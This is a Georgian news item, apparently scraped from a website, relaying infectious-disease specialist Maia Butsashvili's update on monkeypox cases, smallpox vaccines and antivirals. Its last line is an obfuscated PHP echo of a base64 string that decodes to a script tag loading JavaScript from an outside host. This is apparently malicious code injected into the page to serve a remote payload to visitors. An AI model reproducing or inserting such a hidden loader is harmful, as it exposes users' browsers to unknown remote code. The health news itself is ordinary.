celsiusi
ავერსი შნაიდერი
მაია ბუწაშვილი მაიმუნის ყვავილის შესახებ განახლებულ ინფორმაციას აქვეყნებს. როგორც facebook-ზე ინფექციონისტი წერს, გასული დღე-ღამის განმავლობაში ვირუსის პირველი შემთხვევები დაფიქსირდა კიდევ სამ ქვეყანაში - ჩეხეთში, სლოვენიასა და ემირატებში, ჯამში კი 18 ქვეყანაში 300-მდე რეგისტრირებული შემთხვევაა. 
 
ინფექციონისტი აღნიშნავს, რომ ადამიანთა ის ნაწილი, ვინც 80-იან წლებამდე ყვავილის საწინააღმდეგოდ იყო აცრილი, მაღალი ალბათობით იმუნურია მაიმუნის ყვავილის მიმართაც.
 
"დღეისათვის 300-მდე შემთხვევაა რეგისტრირებული 18 ქვეყანაში (ევროპის ქვეყნები, აშშ, კანადა, ავსტრალია, არაბეთის გაერთიანებული ემირატები).
 
გასული დღე-ღამის განმავლობაში სამ ახალ ქვეყანაში - ჩეხეთში, სლოვენიასა და ემირატებში - დაფიქსირდა პირველი შემთხვევები.
 
მხოლოდ გუშინ ბრიტანეთში 14 ახალი პაციენტი დაარეგისტრირეს და საერთო რაოდენობამ 71 შეადგინა.
 
გერმანიამ შეუკვეთა 40000 დოზა ყვავილის ვაქცინა, რომელიც ასევე ეფექტურია მაიმუნის ყვავილის წინააღმდეგ. აშშ-ში მილიონობით დოზის მარაგი შექმნეს.
 
რამდენიმე დღის წინ FDA ყვავილის საწინააღმდეგო ერთ-ერთი ანტივირუსული პრეპარატის ინტრავენური ფორმა დაამტკიცა. ამ პრეპარატის პერორალური ფორმა რამდენიმე წლის წინ დამტკიცდა. ამჟამად ინტრავენური ფორმა შეიქმნა იმ პაციენტებისთვის, ვისაც ყლაპვა არ შეეძლება.
 
ადამიანთა ის ნაწილი, ვინც 80-იან წლებამდე ყვავილის საწინააღმდეგოდ იყო აცრილი, მაღალი ალბათობით იმუნურია მაიმუნის ყვავილის მიმართაც.
 
გასულ წლებში ყვავილის საწინააღმდეგო ვაქცინის და ანტივირუსული მედიკამენტების დარეგისტრირების ერთ-ერთი მიზეზი, სავარაუდოდ, ყვავილის, როგორც ბიოლოგიური იარაღის, არსებობა იყო.
 
2019 წელს უშუალოდ მაიმუნის ყვავილის საწინააღმდეგო ვაქცინაც დარეგისტრირდა," - წერს მაია ბუწაშვილი.
 
676
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");